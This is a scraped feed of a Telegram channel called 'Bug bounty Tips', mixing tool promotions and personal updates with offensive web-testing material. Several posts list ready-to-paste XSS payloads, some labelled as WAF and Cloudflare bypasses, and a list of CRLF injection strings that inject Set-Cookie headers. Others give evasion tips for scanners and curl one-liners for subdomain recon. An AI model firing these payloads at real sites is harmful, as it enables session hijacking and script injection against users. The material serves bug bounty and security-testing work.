¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
Bug bounty Tips
Ir al canal en Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Mostrar más5 853
Suscriptores
+1124 horas
+687 días
+37430 días
Archivo de publicaciones
5 854
I have share a video on which operating system is better on instagram so do check it out guys
https://www.instagram.com/reel/C9ww22ry8Ub/?igsh=MzRlODBiNWFlZA==
5 854
🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe
5 854
🔖10 Juicy XSS payloads that you can use.
1️⃣. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634
2️⃣. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag
3️⃣. <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass
4️⃣. ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the
5️⃣. <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>
6️⃣. <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/
7️⃣. <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera
8️⃣. <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
9️⃣. <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
1️⃣🅾️. jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)
🐱 github
💡You can check the group for more resources
#XSS #BugBounty #BugBountyTips
🔸🔸 Share & Support Us 🔸 🔸
✔️ Channel: @bugbounty_tech
👥 Group: @bugbounty_talks
5 854
You know guys, for today it's going to be a 1yr, starting this channel, I didn't expect that I am going to reach till here that too near 1k followers, I would like to thank one and all.
At first I was losing hope that this is not going to happen but today I realised that a long term goal can keep you happy and being more consistent can do lot of wonders.
Thanks everyone and I will workhard on giving you guys more and more better BugBounty tips.
And I have took a challenge that cipherops should be a part of the reason that everyone get there first bounty happily.
5 854
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
✅Download- https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
5 854
How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
5 854
Bug Bounty Tip
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
5 854
Just discovered https://web-check.xyz and recommend that you do to!
It's an ALL-IN-ONE OSINT tool for analysing websites. You give it a URL and it gives you:
Server Location and IP info
SSL Certificate
Domain Whois
Server info
Cookies
Headers
DNS Records
HTTP Security
Social Tags
Security.txt
DNS Server
Firewall
DNS Security
HSTS Check
Threats
TLS Cipher Suites
TLS Security Issues
TLS Handshake Simulation
Redirects
Linked Pages
Crawl Rules
Server Status
Open ports
Text records
Carbon footprint
5 854
Check out this new. Post on my Instagram
https://www.instagram.com/p/C9jWm19SikU/?igsh=MzRlODBiNWFlZA==
5 854
Hello, guys good evening, this week VDP program is here check this website and try out and do update things and let us know how the BugBounty is going on
https://www.humanprotocol.org/vulnerability-disclosure-policy
5 854
Web Hacking Tip: - jhaddix
When using ffuf change the user agent string as the default one "Fuzz Faster U Fool" is commonly blocked.
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"5 854
📌Targeted Scanning with Burp Suite: A Regex Pattern for example.com
❓As a penetration tester or bug bounty hunter, it's essential to focus your scanning efforts on the specific domains and subdomains that matter. In this post, we'll explore a regex pattern that helps you target the example.com domain and its subdomains in Burp Suite, and how to combine it with powerful tools to get more fine-grained results.
💵The Regex Pattern:
(^|^[^:]+:\/\/|[^\.]+\.)example.*
🛍Let's break down this pattern:
(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.
([^\.]+\.): Matches the subdomain (if any) before the main domain example.
example: The main domain name, replaced with example in this example.
.*: Matches any characters (including none) after the main domain name.
🛍This pattern will match any URLs that contain the domain example and may include:
Protocols like http:// or https://
Subdomains like sub.example or foo.bar.example
Paths and query strings like /path/to/resource?param=value
❗️Using this Pattern in Burp Suite:
✔️Add this regex pattern to the "Add Scope" section in Burp Suite to specify the scope of URLs that Burp should target. This will help Burp focus on the specific domain and its subdomains, and ignore other unrelated URLs.
❗️Combining with Powerful Tools:
✔️To get more fine-grained results, combine this regex pattern with the following tools in Burp Suite:
1.Burp JS Link Finder: Finds JavaScript files and links on the target website.
2.Paraminer: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.
3.Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.
4.Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.
5.SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.
⚡️By using this regex pattern and combining it with these powerful tools, you can perform a more targeted and efficient vulnerability scan on the example.com domain and its subdomains.
☄️Happy Hunting!☄️
5 854
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
5 854
𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱:
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><cybertix onbeforetoggle="+a+b+c+" popover id=x>CYBERTIX</cybertix>")
BY @cybertix
5 854
Subdomain finder one-liners
find subdomains from various sources and add them to output.txt file. (will need a sort out)
(curl -s "https://rapiddns.io/subdomain/$TARGET?full=1#result" 2>/dev/null | grep "<td><a" 2>/dev/null | cut -d '"' -f 2 2>/dev/null | grep http 2>/dev/null | cut -d '/' -f3 2>/dev/null | sed 's/#results//g' 2>/dev/null | sort -u 2>/dev/null) > output.txt
(curl -s https://dns.bufferover.run/dns?q=.$TARGET 2>/dev/null |jq -r .FDNS_A[] 2>/dev/null |cut -d',' -f2 2>/dev/null|sort -u 2>/dev/null ) >> output.txt
(curl -s "https://riddler.io/search/exportcsv?q=pld:${TARGET}" 2>/dev/null| grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null| sort -u 2>/dev/null ) >> output.txt
(curl -s "https://www.virustotal.com/ui/domains/${TARGET}/subdomains?limit=40" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://certspotter.com/api/v1/issuances?domain=${TARGET}&include_subdomains=true&expand=dns_names" 2>/dev/null | jq .[].dns_names 2>/dev/null | tr -d '[]"\n ' 2>/dev/null | tr ',' '\n'2>/dev/null ) >> output.txt
(curl -s "https://jldc.me/anubis/subdomains/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://securitytrails.com/list/apex_domain/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null| grep "${TARGET}" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl --silent https://sonar.omnisint.io/subdomains/$TARGET 2>/dev/null | grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2F$TARGET" 2>/dev/null| grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://crt.sh/?q=%25.$TARGET&output=json" 2>/dev/null| jq -r '.[].name_value' 2>/dev/null| sed 's/\*\.//g' 2>/dev/null| sort -u 2>/dev/null ) >> output.txt